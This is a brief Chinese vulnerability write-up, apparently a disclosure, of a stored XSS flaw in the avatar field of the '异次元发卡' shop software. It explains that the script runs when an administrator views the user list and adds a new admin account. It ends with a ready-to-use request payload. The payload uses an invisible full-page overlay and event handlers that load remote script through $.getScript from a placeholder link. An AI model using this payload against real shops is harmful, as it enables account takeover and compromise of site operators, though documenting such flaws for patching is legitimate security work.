异次元发卡存储xss漏洞

异次元商店头像上传处存在存储型XSS注入（user、admin均存在）。其中，user处有过滤，admin无。

将恶意脚本插入后，管理员访问用户管理页面即可执行恶意脚本。

恶意脚本执行后，会新增一个管理员用户，进而获得权限。

avatar=/favicon.ico"/style="position:absolute;top:-500px;left:-500px;width:200%;height:900%;z-index:1000;opacity:0.0"/ontouchmove="$.getScript('payload链接')"/onmouseenter=$.getScript('payload链接')//&qq=&nicename=&settlement=0&alipay=&wechat=